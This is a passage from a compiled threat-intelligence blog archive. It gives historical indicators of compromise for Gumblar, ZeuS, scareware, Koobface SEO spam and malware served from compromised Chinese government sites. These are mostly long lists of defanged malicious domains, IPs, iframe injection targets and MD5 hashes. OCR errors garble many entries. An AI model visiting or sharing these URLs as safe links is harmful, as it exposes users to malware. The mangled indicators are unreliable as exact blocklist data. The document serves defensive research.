According to [1]security researchers the [2]Gumblar botnet is making a comeback suc- 
cessfully affecting thousands of users globally potentially compromising the confidentiality 


availability and integrity of the targeted host to a multi-tude of malicious client-side exploits 
serving domains further dropping malicious software on the affected hosts. 


In this post we’ll provide actionable intelligence on the infrastructure behind it and dis- 
cuss in-depth the tactics techniques and procedures of the cybercriminals behind it. 


Malicious URLs known to have participated in the campaign: 


hxxp://ncenterpanel.cn/php/unv3.php 


hxxp://ncenterpanel.cn/php/p31.php 


Related malicious MD5s known to have participated in the campaign: 


MD5: 3f5b905c86d4dcaab9c86eddffle02c7 
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MD5: 61461d9c9c1954193e5e0d4148a81a0c 
MD5: 65cd1da3d4cc0616b4a0d4a862a865a6 


MD5: 7de29e5e10adc5d90296785c89aeabce 


Sample URL redirection chain: 
hxxp://gumblar.cn/rss/?id - 71.6.202.216 - Email: cuitiankai@googlemail.comi 
hxxp://gumblar.cn/rss/?id=2 


hxxp://gumblar.cn/rss/?id=3 


Related malicious domains known to have participated in the campaign: 


hxxp://martuz.cn - 95.129.145.58 


With Gumblar making a come-back it’s becoming evident that cybercriminals continuing 
utilizing the usual set of malicious and fraudulent tactics for the purpose of spreading mali- 
cious software and affecting hundreds of thousands of legitimate Web sites in a cost-effective 
and efficient way. 


We'll continue monitoring the campaign and post updates and post updates as soon as 
new developments take place. 


1. https://en.wikipedia.org/wiki/Gumbla 
2. https://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activit 


14.6.3 Historical OSINT - A Diverse Portfolio of Fake Security Software 
(2018-10-20 20:22) 


In this post I'll profile a currently circulating circa 2008 malicious and fraudulent scareware- 
serving campaign successfully enticing users into interacting with rogue and fraudulent fake 
security software with the cybercriminals behind the campaign successfully earning fraudulent 
revenue in the process of monetizing access to malware-infected hosts largely relying on the 
utilization of an affiliate-network based type of revenue-sharing scheme. 


Related malicious domains known to have participated in the campaign: 
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hxxp://globals-advers.com 
hxxp://alldiskscheck300.com 
hxxp://multisearchl.com 
hxxp://myfreespace3.com 
hxxp://hottystars.com 
hxxp://multilang1.com 
hxxp://3gigabytes.com 
hxxp://drivemedirect.com 
hxxp://globala2.com/soft.php 
hxxp://teledisons.com 
hxxp://theworldnews5.com 
hxxp://virtualblog5.com 
hxxp://grander5.com 
hxxp://5starsblog.com 
hxxp://globalreds.com 
hxxp://global-advers.com 
hxxp://ratemyblog1.com 
hxxp://greatvideo3.com 
hxxp://beginner2009.com 
hxxp://fastwebway.com 
hxxp://blazervips.com 
hxxp://begin2009.com 
hxxp://megatradetds0O.com 
hxxp://securedonlinewebspace.com 


hxxp://proweb-info.com 
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hxxp://security-www-clicks.com 
hxxp://updatedownloadlists.com 
hxxp://styleonlyclicks.cn 
hxxp://informationgohere.com 
hxxp://world-click-service.com 
hxxp://secutitypowerclicks.cn 
hxxp://securedclickuser.cn 
hxxp://slickoverview.com 
hxxp://viewyourclicks.com 
hxxp://clickwww2.com 
hxxp://clickadsystem.com 
hxxp://becomepoweruser.cn 


hxxp://clickoverridesystem.cn 


Related malicious domains known to have participated in the campaign: 


hxxp://protecteduser.cn 
hxxp://internetprotectedweb.com 
hxxp://clicksadssystems.com 
hxxp://whereismyclick.cn/ 
hxxp://trustourclicks.cn 
hxxp://goldenstarclick.cn 


hxxp://defendedsystemuser.cn 


Related malicious domains known to have participated in the campaign: 


hxxp://drivemedirect.com 
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hxxp://virtualblog5.com 


hxxp://fastwebway.com 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 

14.6.4 Historical OSINT - Calling Zeus Home (2018-10-20 20:25) 

Remember ZeuS? The infamous crimeware-in-the-middle exploitation kit? In this post I'll 
provide historical OSINT on various ZeuS-themed malicious and fraudulent campaigns inter- 


cepted throughout 2008 and provide actionable intelligence on the infrastructure behind the 
campaign. 


Related malicious domains known to have participated in the campaign: 
hxxp://myxaxa.com/z/cfg.bin 
hxxp://dokymentu.info/zeus/cfg.bin 
hxxp://online-traffeng.com/zeus/cfg.bin 
hxxp://malwaremodel.biz/zeus/cfg.bin 
hxxp://giftcardsbox.com/web/cfg.bin 
hxxp://dOrnk.com/cfg.bin 
hxxp://rfs-group.net/cool/cfg.bin 
hxxp://62.176.16.19/11/cfg.bin 
hxxp://81.95.149.74/demo/cfg.bin 
hxxp://66.235.175.5/.cs/cfg.bin 
hxxp://208.72.169.152/web/cfg.bin 
hxxp://antispyware-protection.com/web/cfg.bin 
hxxp://sOs1.net/web/cfg.bin 
hxxp://208.72.169.151/admin/cfg.bin 


hxxp://1ntr0.com/zuzu/cfg.bin 
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hxxp://88.255.90.170/bt/fiz/cfg.bin 
hxxp://58.65.235.4/web/conf/cfg.bin 
hxxp://forgoogleonly.cn/open/cfg.bin 


hxxp://194.1.152.172/11/cfg.bin 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.5 Historical OSINT - Chinese Government Sites Serving Malware 
(2018-10-20 20:28) 
It’s 2008 and I’m stumbling upon yet another decent portfolio of compromised malware- 


serving Chinese government Web sites. In this post I’ll discuss in-depth the campaign and 
provide actionable intelligence on the infrastructure behind it. 


Compromised Chinese government Web site: 


hxxp://nynews.gov.cn 


Sample malicious domains known to have participated in the campaign: 
hxxp://game1983.com/index.htm 
hxxp://sp.070808.net/23.htm 


hxxp://higain-hitech.com/mm/index.html 


Currently affected Chinese government Web sites: 


hxxp://www.tgei.gov.cn/dom.txt - iframe - hxxp://www.b110b.com/chbr/110.htm?id=884- 
191 


hxxp://hfinvest.gov.cn/en/aboutus/index.asp - iframe - hxxp://nnbzc12.kki.cn/indax.htm 
hxxp://www.whkx.gov.cn/iii.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.htm 


hxxp://xc.haqi.gov.cn/jay.htm - iframe - hxxp://xc.haqi.gov.cn/jay.htm - 
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hxxp://qqnw.gov.cn/ST.htm 


hxxp://www.whkx.gov.cn/mohajem.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou- 
/evil.Atm 


hxxp://www.whkx.gov.cn/iii.txt - iframe - hxxp://user.free2.77169.net/shmilyzhutou/evil.hAtm 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.6 Historical OSINT - Hundreds of Bogus Bebo Accounts Serving Malware 
(2018-10-20 20:29) 

It’s 2010 and I’ve recently intercepted a wide-spread Bebo malicious malware-serving cam- 

paign successfully enticing users into interacting with the fraudulent and malicious content 


potentially compromising the confidentiality availability and integrity of the targeted host to a 
multi-tude of malicious software. 


Sample malicious domains known to have participated in the campaign: 
hxxp://boss.gozbest.net/xd.html - 216.32.83.110 
hxxp://tafficbots.com/in.cgi?6 

hxxp://bolapaqir.com/in.cgi?2 


hxxp://mybig-porn.com/promo4/?aid=1339 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.7 Historical OSINT - PhishTube Twitter Broadcast Impersonated Scareware 
Serving Twitter Accounts Circulating (2018-10-20 22:10) 


It’s 2010 and I’ve recently intercepted a currently circulating malicious and fraudulent 
malware-serving spam campaign successfully enticing hundreds of thousands of users glob- 
ally into interacting with the rogue and malicious software found on the compromised hosts in 
combination with a currently active Twitter malware-serving campaign successfully enticing 
users into interacting with the rogue and bogus content. 
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In this post I'll provide actionable intelligence on the infrastructure behind the campaign 
and provide actionable intelligence on the infrastructure behind it. 


Sample malicious domains known to have participated in the campaign: 
hxxp://PhishTube-Broadcast-811.5a5.us 

hxxp://Sony-195.5us.us 

hxxp://Hummer-631.5a5.us 

hxxp://PS3-502.24dat.com 

hxxp://PS3-843.5us.us 

hxxp://Air-France-133.5a5.us 

hxxp://PS3-519.5a5.us 

hxxp://Sony-918.24dat.us 


hxxp://Natal-29.5a5.us 


Sample malicious domains known to have participated in the campaign: 


hxxp://su7.us/tds/go.php?sid=1 


Sample URL redirection chain: 


http://66.199.229.253/etds/go.php?sid=4 -> -> http://mybig-porn.com/promo1/?aid=1470 -> 


hxxp://online-adult-directory.com/?aid=10012 -> hxxp://yourdatingnetwork.com/?aid=697 


Sample malware known to have participated in the campaign: 


MD5: a4ff9c2b4fd6917d12e962a7b6173143 
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14.6.8 Historical OSINT - Massive Blackhat SEO Campaign Courtesy of the Koobface 
Gang Spotted in the Wild (2018-10-20 22:28) 


It’s 2010 and I’ve recently stumbled upon yet another massive blackhat SEO campaign 


courtesy of the Koobface gang successfully exposing hundreds of thousands of users to a 
multi-tude of malicious software. 


In this post I’ll provide actionable intelligence on the infrastructure behind it and discuss 
in the depth the tactics techniques and procedures of the cybercriminals behind it. 


Sample domains known to have participated in the campaign: 
hxxp://jhpegdueeunz.55fast.com 
hxxp://vzhusyeeaubk.55fast.com 
hxxp://cvzizliiustw.55fast.com 
hxxp://zetaswuiouax.55fast.com 
hxxp://shzopfioarpd.55fast.com 
hxxp://nqpubruioeat.55fast.com 
hxxp://krrepteievdr.55fast.com 
hxxp://gtoancoiuyqv.55fast.com 
hxxp://felopfooaydk.55fast.com 
hxxp://dknejxaeozjb.55fast.com 
hxxp://ljperwaaoxjs.55fast.com 
hxxp://hxmagxaeulbn.55fast.com 
hxxp://mueombooikgp.55fast.com 
hxxp://gluezneoolhs.55fast.com 
hxxp://ptpodseeanvk.55fast.com 
hxxp://jgdeyraoojdr.55fast.com 


hxxp://kjsetqaoojdr.55fast.com 
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hxxp://kvuelveuicmn.55fast.com 
hxxp://ywoamnooikfp.55fast.com 
hxxp://dnkopgioawss.55fast.com 
hxxp://qjtepyaoigts.55fast.com 
hxxp://fdsudpeeewam.55fast.com 
hxxp://qumobxoiigst.55fast.com 
hxxp://fkvahzaeibbz.55fast.com 
hxxp://Ixxikhiuutwm.55fast.com 
hxxp://meboczoiikgy.55fast.com 
hxxp://mevoxliiidyg.55fast.com 
hxxp://hxvoysaoozhp.55fast.com 
hxxp://wiaabcoookfs.55fast.com 


hxxp://wlbatgeeiohc.55fast.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://narezxaauggf.55fast.com 
hxxp://gdsetqaoocks.55fast.com 
hxxp://ptxihhiiihpg.55fast.com 
hxxp://ramilhueamxg.55fast.com 
hxxp://vvnoxliiigsp.55fast.com 
hxxp://ywweypeaeemz.55fast.com 
hxxp://rqqetweeupwn.55fast.com 
hxxp://fprewmaoojpn.55fast.com 
hxxp://kbmahjiiigow.55fast.com 


hxxp://romozjuuurov.55fast.com 
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hxxp://tmxufseaacks.55fast.com 
hxxp://viaegjiooeun.55fast.com 
hxxp://znmasdiiicoc.55fast.com 
hxxp://gdbiczooaoaw.55fast.com 
hxxp://boqegkooouom.55fast.com 
hxxp://xncoxloiiwrm.55fast.com 
hxxp://flxowreuuhkb.55fast.com 
hxxp://zzkihgiuupwb.55fast.com 
hxxp://gxcobmeeuvls.55fast.com 
hxxp://wygimweuizxz.55fast.com 
hxxp://winowmeaoxhy.55fast.com 
hxxp://hhpewmaoidtm.55fast.com 
hxxp://nemoxloiixlh.55fast.com 
hxxp://bvbowvooigtq.55fast.com 
hxxp://pgmassuiixvx.55fast.com 
hxxp://vbxoxkiiijst.55fast.com 
hxxp://clnobhaoobzf.55fast.com 


hxxp://proawnaoozxf.55fast.com 


Sample malicious domains known to have participated in the campaign: 
hxxp://romwrpueerr.007gb.com 

hxxp://rtperweaauux.5nxs.com 

hxxp://prougpeeabzd.hostevo.com 

hxxp://stwermoiigwc.10fast.net 


hxxp://znmasdiiicoc.55fast.com 
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hxxp://gjxotyuuobmv.007sites.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://dpfujhiuijnd.hostevo.com 
hxxp://gfhizliiikjd.hostevo.com 
hxxp://driozkuuegic.hostevo.com 
hxxp://rrkinfuuuspr.hostevo.com 
hxxp://xzkikhueeivf.hostevo.com 
hxxp://trqawmaookgp.hostevo.com 
hxxp://nhggudseuerqn.hostevo.com 
hxxp://phveflaeulmn.hostevo.com 
hxxp://cvxiljiuuyrm.hostevo.com 
hxxp://fdseffuueqiv.hostevo.com 
hxxp://dsteyraaaxgr.hostevo.com 
hxxp://pfjocbeuiznb.hostevo.com 


hxxp://ccziljiuurab.hostevo.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://jgfuspeeeauc.hostevo.com 
hxxp://grioxhueoxlf.hostevo.com 
hxxp://dpdilkiiihfy.hostevo.com 
hxxp://miuonbaoifwv.hostevo.com 
hxxp://fpteymoiugqmj.hostevo.com 
hxxp://dyoovziuebvj.hostevo.com 


hxxp://rpdojzaaesgg.hostevo.com 
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hxxp://zzkuhguuewib.hostevo.com 
hxxp://bqyunruiaecw.hostevo.com 
hxxp://sruoljiuurqb.hostevo.com 
hxxp://stratreaaebk.hostevo.com 
hxxp://kjsetwaookdt.hostevo.com 
hxxp://prougpeeabzd.hostevo.com 
hxxp://nrfitdioaoyd.hostevo.com 
hxxp://cxligdueewoc.hostevo.com 
hxxp://tqaawmaoamvj.hostevo.com 
hxxp://qunoxliiifyw.hostevo.com 
hxxp://zkfusteaanch.hostevo.com 
hxxp://qumobcooozjf.hostevo.com 
hxxp://sqqawmaaamvj.hostevo.com 
hxxp://klguyraoojdr.hostevo.com 
hxxp://fspespueeiez.hostevo.com 


hxxp://sjcadjoaepfh.55fast.com 


Sample malicious domains known to have participated in the campaign: 
hxxp://sjcadjoaepfh.55fast.com 

hxxp://pkbadlaeujcv.55fast.com 

hxxp://vnvocziiifst.55fast.com 

hxxp://wauanbooikfy.55fast.com 

hxxp://yovikdeaanch.55fast.com 

hxxp://jvuelvaeukcc.55fast.com 


hxxp://Ikgufpeeaunz.55fast.com 


5656 


hxxp://kjfufseeeim!.55fast.com 
hxxp://ommoxliiifdt.55fast.com 
hxxp://nqtuxneuixbb.55fast.com 
hxxp://wioabnaoikfp.55fast.com 
hxxp://ssdikzaaaiiq.55fast.com 
hxxp://rwwaammaaeowm.55fast.com 


hxxp://ljifsueaumz.55fast.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://Iljifsueaumz.55fast.com 
hxxp://nbzigpeaoksq.55fast.com 
hxxp://mvjufraoidqb.55fast.com 
hxxp://hgdupraoisqc.55fast.com 
hxxp://khdudseeeauc.55fast.com 
hxxp://fspetwaaabxh.55fast.com 
hxxp://tqoavxoiidyq.55fast.com 
hxxp://xeaubwuiardg.55fast.com 
hxxp://nbvoncooolhp.55fast.com 
hxxp://wexigpaoambl.55fast.com 
hxxp://klhuggiuufdt.55fast.com 
hxxp://dxwetteoigst.55fast.com 
hxxp://glvashoaeygj.55fast.com 


hxxp://xmoejcaeujxc.55fast.com 


Sample malicious domains known to have participated in the campaign: 
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hxxp://jfsfkfuueqw.007gb.com 
hxxp://bbxcimoiify.007gb.com 
hxxp://ljgjxkueewi.007gb.com 
hxxp:///xzkgkguueaa.007gb.com 
hxxp://wmhjvkuaabj.007gb.com 
hxxp://yqobzmciuupt.007gb.com 
hxxp://Ilvxvieaoizj.007gb.com 
hxxp://srnvuioookf.007gb.com 
hxxp://melhlhueege.007gb.com 


hxxp://Ikhjclueuwa.007gb.com 


Sample malicious domains known to have participated in the campaign: 
hxxp://Ikhjclueuwa.007gb.com 
hxxp://bvgsfyaooxh.007gb.com 
hxxp://xbkhceeuifd.007gb.com 
hxxp://ywncmvoiojf.007gb.com 
hxxp://kjptpwaaacl.007gb.com 
hxxp://gopmcumooavx.007gb.com 
hxxp://dpwnaioookf.007gb.com 
hxxp://stqnaiaoihd.007gb.com 
hxxp://fspygfuuerq.007gb.com 
hxxp://wbgtsyeaamb.007gb.com 
hxxp://fprmwoaaavl.007gb.com 
hxxp://mmxInvoiijd.007gb.com 


hxxp://vvllnmooocl.007gb.com 
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Sample malicious domains known to have participated in the campaign: 


hxxp://vvllnmooocl.007gb.com 
hxxp://zZlgsgpeaabz.007gb.com 
hxxp://ccjfxleeewq.007gb.com 
hxxp://cvhfjguueqi.007gb.com 
hxxp://Ihprsraaack.007gb.com 
hxxp://razzbciiupt.007gb.com 
hxxp://rancoeooozh.007gb.com 
hxxp://muczimoooxh.007gb.com 
hxxp://tphotdioetdf.hostevo.com 
hxxp://vvxifpeaocks.hostevo.com 
hxxp://jjhillooolhf.hostevo.com 
hxxp://bzxixliiudpr.hostevo.com 
hxxp://xmvovxooozhp.hostevo.com 
hxxp://proocziuuprm.hostevo.com 
hxxp://qebovziuuswb.hostevo.com 
hxxp://xzhusteaabzs.hostevo.com 


hxxp://bbbovxiuifyq.hostevo.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://dpretqaoocjy.hostevo.com 
hxxp://ywaaqbaoozjs.5nxs.com 
hxxp://fsyepteaaenl.5nxs.com 


hxxp://jngufpeeeaic.5nxs.com 
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hxxp://dsterqaaoczg.5nxs.com 
hxxp://rivilhueeiuc.5nxs.com 
hxxp://znouxneuaayd.5nxs.com 
hxxp://kkgijguueonh.5nxs.com 
hxxp://khsamvooihdt.5nxs.com 
hxxp://nncikgueaflg.5nxs.com 
hxxp://fdpixnaaaoiv.5nxs.com 
hxxp://zzzikhiiihfy.5nxs.com 


hxxp://sqaayteaaimz.5nxs.com 


Sample malicious domains known to have participated in the campaign: 
hxxp://tquambooilhs.5nxs.com 
hxxp://gdtaqboiojdt.5nxs.com 
hxxp://queoxliuudtq.5nxs.com 
hxxp://vbcokloiikhs.5nxs.com 
hxxp://raoadpiuigst.5nxs.com 
hxxp://qevijfueeibj.5nxs.com 
hxxp://kjlicvoooncj.5nxs.com 
hxxp://sroavlueeixd.5nxs.com 
hxxp://xxlijkiuuyqm.5nxs.com 
hxxp://vvcijreaaenl.5nxs.com 
hxxp://zzkigdueurab.5nxs.com 
hxxp://zxkigdueeoel.5nxs.com 


hxxp://tqoanvooijfy.5nxs.com 
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Sample malicious domains known to have participated in the campaign: 


hxxp://wnxufpeaaevj.5nxs.com 
hxxp:///ptaamboiihsw.5nxs.com 
hxxp://vbxijnueurix.5nxs.com 
hxxp://streqwaooxcg.5nxs.com 
hxxp://ptyewmaoolgy.5nxs.com 
hxxp://hgyeqboiihpw.5nxs.com 
hxxp://cxjijgueeaez.5nxs.com 
hxxp://woeobvoiihdt.5nxs.com 
hxxp://ocxixjueugmj.5nxs.com 
hxxp://mmvobxoiihdr.5nxs.com 
hxxp://prqawnaoozgy.5nxs.com 
hxxp://xzkugsueeunk.5nxs.com 
hxxp://vvbovxiiidym.5nxs.com 
hxxp://qinozkiuidyw.5nxs.com 


hxxp://todumweuughh.5nxs.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://todumweuughh.5nxs.com 
hxxp://zkfudpeaaech.5nxs.com 
hxxp://vvcijfueeamk.5nxs.com 
hxxp://jkhindiuuypw.5nxs.com 
hxxp://womancoiuyav.5nxs.com 


hxxp://sfkoyfooepgh.5nxs.com 
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hxxp://zzhetqaooxkd.5nxs.com 
hxxp://czjudyeaacjp.5nxs.com 
hxxp://gssudpeaaecg.5nxs.com 
hxxp://wiuobvooozjp.5nxs.com 
hxxp://twaamnaookhd.5nxs.com 


hxxp://bbvocloiigsr.5nxs.com 


Sample malicious domains known to have participated in the campaign: 
hxxp://dspugduuuytm.5nxs.com 
hxxp://kljigdueeqic.5nxs.com 
hxxp://gpioxhuuutav.5nxs.com 
hxxp://wouavcooiyil.5nxs.com 
hxxp://mevoxliuuyrm.5nxs.com 
hxxp://xvcocxoiojfy.5nxs.com 
hxxp://zljudyeaaunl.5nxs.com 
hxxp://woaabcoiusst.5nxs.com 
hxxp://dppudpeeewmh.5nxs.com 
hxxp://zzhustueequk.5nxs.com 


hxxp://quboczoiolgd.5nxs.com 


Sample malicious domains known to have participated in the campaign: 
hxxp://kdwetmoiuics.5nxs.com 

hxxp://jgfudseeerqb.5nxs.com 

hxxp://qunolhueeonx.5nxs.com 


hxxp://khdusyeaaeez.5nxs.com 
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hxxp://bvcikgueequx.5nxs.com 
hxxp://xzjupteaovzg.5nxs.com 
hxxp://rmludpueoebj.5nxs.com 
hxxp://pfyupteeeauz.5nxs.com 
hxxp://qqreqnoeewhs.5nxs.com 
hxxp://ysfuyraaaczs.5nxs.com 
hxxp://ljdudyeaamcj.5nxs.com 
hxxp://vbvovziiustm.5nxs.com 


hxxp://gffugdueeibz.5nxs.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://onjdzkiuuyw.007gb.com 
hxxp://dpppdpeeeii.007gb.com 
hxxp://zzfdhdeeeoe.007gb.com 
hxxp://Ahhhzciuusa.007gb.com 
hxxp://dpmlbkiuuta.007gb.com 
hxxp://ccgsgpeaaev.007gb.com 
hxxp://vbzxecoiuso.007gb.com 
hxxp://nbkfhdeaack.007gb.com 
hxxp://omvcaoeeaoe.007gb.com 
hxxp://xchfggiuewq.007gb.com 


hxxp://jgypgpeaoxh.007gb.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://jgypgpeaoxh.007gb.com 
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hxxp://hdstpraoojd.007gb.com 
hxxp://nnkkvziiigh.007gb.com 
hxxp://qwyduquuoeo0.007gb.com 
hxxp://jhgdkzooobn.007gb.com 
hxxp://ljyqweoiihf.007gb.com 
hxxp://xzfdfsueaux.007gb.com 
hxxp://kjfhzjueeae.007gb.com 
hxxp://tanbuoeaanb.007gb.com 
hxxp://rammooaaocx.007gb.com 
hxxp://gsmxmlueoht.007gb.com 
hxxp://xxjgkguueuu.007gb.com 
hxxp://jgppfpeeaev.007gb.com 


hxxp://xzfpfpeaozh.007gb.com 


Sample malicious domains known to have participated in the campaign: 
hxxp://khsphdueaev.007gb.com 

hxxp://wabnieoiikg.007gb.com 

hxxp://rojshgeoisw.007gb.com 

hxxp://zlhffgueaec.007gb.com 

hxxp://quxxmnoiokd.007gb.com 

hxxp://rpsdkzoeeqq.007gb.com 

hxxp://rozfksaoiht.007gb.com 

hxxp://vvzkcviiuru.007gb.com 

hxxp://ptgdghueedq.007gb.com 


hxxp://xvjhcliuufi.007gb.com 
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hxxp://ywqntweaeqo.007gb.com 


hxxp://mubwqaaaoxl.007gb.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://quzjlgueeib.007gb.com 
hxxp://fdyttteeaou.007gb.com 
hxxp://xxjggseeeom.007gb.com 
hxxp://robvimoiikg.007gb.com 
hxxp://hgspsyeeanx.007gb.com 
hxxp://nozkckueein.007gb.com 
hxxp://syfdgmoiipy.007gb.com 


hxxp://nmkjzjueequ.007gb.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://nmkjzjueequ.007gb.com 
hxxp://ytwqyteaaen.007gb.com 
hxxp://kgdfkhuuuyg.007gb.com 
hxxp://zbcvieaoocc.007gb.com 
hxxp://sywrdpeeeie.007gb.com 
hxxp://prnmwaaaamm.007gb.com 
hxxp://djddhfuuilc.007gb.com 
hxxp://wibnuboiusw.007gb.com 
hxxp://muclmboiigd.007gb.com 
hxxp://vvlkevoiidy.007gb.com 


hxxp://xhprrteaaun.007gb.com 
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hxxp://bncvoeaaauu.007gb.com 


Sample malicious domains known to have participated in the campaign: 
hxxp://ravhzluuewo.007gb.com 
hxxp://gsywptaaabz.007gb.com 
hxxp://xxkzbcoiijd.007gb.com 
hxxp://mevirwaaovlf.hostevo.com 
hxxp://roboxloiihdt.007sites.com 
hxxp://rauonbooozkf.007sites.com 
hxxp://ywiatreeewam.007sites.com 
hxxp://nxfetmaoolfr.007sites.com 
hxxp://gkmelbeuoear.007sites.com 
hxxp://mmcigsueeexg.007sites.com 
hxxp://vxxiljoioxxg.10fast.net 
hxxp://jgsuspeeeaic.10fast.net 
hxxp://qenocxiiihsr.10fast.net 
hxxp://Iklilliiigdt.10fast.net 


hxxp://ngdepreaamzs.10fast.net 


Sample malicious domains known to have participated in the campaign: 
hxxp://gffupteaaebj.10fast.net 

hxxp:///kljigfuuugfp.10fast.net 

hxxp://raianvoiokgy.10fast.net 

hxxp://rtqerqeaamcg.10fast.net 


hxxp://gfdugdeaavlis.10fast.net 
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hxxp://ddterboiugsr.10fast.net 
hxxp://jgpewnoiihpq. 10fast.net 
hxxp://kjfpfseeeqo.007gb.com 
hxxp://wubcmciuuya.007gb.com 
hxxp://quzkxvooift.007gb.coml 
hxxp://nbIhIlheaaum.007gb.com 
hxxp://cclxnciuupg.007gb.com 
hxxp://nbhkckueeib.007gb.com 
hxxp://hgddxliuudp.007gb.com 
hxxp://winilhueuwiz.10fast.net 
hxxp://queocliuupqv.10fast.net 
hxxp://gdtaqboiihhs.10fast.net 
hxxp://bbvovbaaancg.10fast.net 
hxxp://fpramvoiiftm.10fast.net 
hxxp://fjliljiiizhp.1Ofast.net 


hxxp://gspedpeeeiel.10fast.net 


Sample malicious domains known to have participated in the campaign: 


hxxp://fssukjaoanbx.5nxs.com 
hxxp://ptaawviuuppw.5nxs.com 
hxxp://IIxozkoiikdg.5nxs.com 
hxxp://kkkijguuuquz.5nxs.com 
hxxp://womobciiiftn.5nxs.com 
hxxp://vvcikgueequl.5nxs.com 


hxxp://2zzoxcooozzl.5nxs.com 


5667 


hxxp://wuuocziuupwn.5nxs.com 
hxxp://hfyeqnoiiftm.5nxs.com 
hxxp://sttewboookgy.5nxs.com 
hxxp://ghhusteaozgt.5nxs.com 
hxxp://fjzoqtuuukiw.5nxs.com 
hxxp://muuaqciueomz.5nxs.com 
hxxp://fsfugduuutav.5nxs.com 
hxxp://jgdeywaoocks.5nxs.com 
hxxp://raniljuuurix.5nxs.com 
hxxp://pabikhueamcg.5nxs.com 
hxxp://gsteqbooikdr.5nxs.com 
hxxp://IIhugfuuerab.5nxs.com 
hxxp://dspeyyeeeauv.5nxs.com 
hxxp://xzkixhuaoczg.5nxs.com 
hxxp://rouawmaaammz.5nxs.com 
hxxp://kxlijjiuuspt.5nxs.com 
hxxp://xzliljiuifyw.5nxs.com 
hxxp://vvvilhiueqac.5nxs.com 
hxxp://tovikhiiufdt.5nxs.com 


hxxp://ttretreeuhgs.5nxs.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://ypserreeuytq.5nxs.com 


hxxp://bvzoknaoigpm.5nxs.com 
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hxxp://nnxihduuutqv.5nxs.com 
hxxp://muzidyeeeevh.5nxs.com 
hxxp://tpdufhiiidrn.5nxs.com 
hxxp://ffoupteeeaqd.5nxs.com 
hxxp://bbxigseeolpm.5nxs.com 
hxxp://gsdugpeaeibj.5nxs.com 
hxxp://pwteyyeaamcg.5nxs.com 
hxxp://zxcoljiiigow.5nxs.com 
hxxp://obmacxoiixjs.5nxs.com 
hxxp://twqawmaooczf.5nxs.com 
hxxp://bbrartuauhjh.5nxs.com 


hxxp://dtiolhueeexd.5nxs.com 


Sample malicious domains known to have participated in the campaign: 


hxxp://gdduhgiiikhd.5nxs.com 
hxxp://ryquhfuuuypr.5nxs.com 
hxxp://sfhijkiuusrn.5nxs.com 
hxxp://staennaoolgy.5nxs.com 
hxxp://vvvoczooolzg.5nxs.com 
hxxp://omnokgueequz.5nxs.com 
hxxp://proocxoiigds.5nxs.com 
hxxp://ptwepwaoozht.5nxs.com 
hxxp://fsdufpeeeovg.5nxs.com 
hxxp://dtlidwoiuyoz.5nxs.com 


hxxp://kvyamboiuhsr.5nxs.com 
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hxxp://kvmardioetyp.5nxs.com 
hxxp://taniljueuwul.5nxs.com 
hxxp://jvnartuuixvx.5nxs.com 


hxxp://qubijgiuutac.5nxs.com 


Sample malicious domains known to have participated in the campaigns: 
hxxp://qebocziuidfy. 10fast.net 
hxxp://gffudpeeeauc. 10fast.net 
hxxp://vbjustaiurox.10fast.net 
hxxp://jgyuptaoutic.10fast.net 
hxxp://Ikhighueeevk.10fast.net 
hxxp://ptpudreeeobz.10fast.net 
hxxp://meeambaooxls.10fast.net 
hxxp://yrreyraaovid.10fast.net 
hxxp://kkdutwaoobzd.10fast.net 
hxxp://czxitbouuquz.10fast.net 
hxxp://lvbovnaoozjp.10fast.net 
hxxp://wiiambaookat.10fast.net 
hxxp://zxkijgueaecg.10fast.net 
hxxp://ywqawqaoovzh.10fast.net 
hxxp://gzoukwuuizbv.10fast.net 
hxxp://roiabcoiigpq.10fast.net 
hxxp://vvlufseaavld.10fast.net 
hxxp://nhgpusyeaamxg.10fast.net 


hxxp://kkkikziiifyg.1Ofast.net 
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hxxp://dtqaczoiuswb.10fast.net 
hxxp://IIzozxoiigow.10fast.net 
hxxp://nmcijkiuuobg.10fast.net 
hxxp://mnxijliuusrm.10fast.net 
hxxp://quuanbooikfy.10fast.net 
hxxp://xxzijnuueuex.10fast.net 
hxxp://gsyepyeaaubk. 10fast.net 
hxxp://tqoaqmaoigsr.10fast.net 
hxxp://cvbocziiikgp.10fast.net 


hxxp://gdyepteaancj.10fast.net 


Sample malicious domains known to have participated in the campaign: 


hxxp://qibocziuewuz.10fast.net 
hxxp://qrkargoaatsf.10fast.net 
hxxp://zzdeymaoifyq.10fast.net 
hxxp://noeancoiutac.10fast.net 
hxxp://qunovnaaammb. 10fast.net 
hxxp://gffugdeeeibk.10fast.net 
hxxp://cmvijsueenls. 10fast.net 
hxxp://tqaeryeaanxj.10fast.net 
hxxp://xmuambiiifyt. LOfast.net 
hxxp://cvnanneeesff.10fast.net 
hxxp://muuaqbooolfy.10fast.net 
hxxp://qimacvaaetyr.10fast.net 


hxxp://vxfutqaoihsw.10fast.net 
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hxxp://ywreyruuuhhg.10fast.net 
hxxp://fdteyteeeoel.10fast.net 
hxxp://ywianvoiupwc.10fast.net 
hxxp://zlgeyraoobls.10fast.net 
hxxp://zkhujdeaojpm.10fast.net 
hxxp://kjfufduuutqm.10fast.net 
hxxp://xxjudpueewiz.10fast.net 
hxxp://rooewmeaamcg.10fast.net 
hxxp://hffugdueeink. 10fast.net 
hxxp://xmcoxzoiikkd.10fast.net 
hxxp://Illizkuiifyq.10fast.net 
hxxp://xmuapsuiovnb.10fast.net 
hxxp://tquanvoiuyqv.10fast.net 
hxxp://kvnartuuyjlk.10fast.net 
hxxp://Illikhioozjf. LOfast.net 
hxxp://yrreypeeamck.10fast.net 


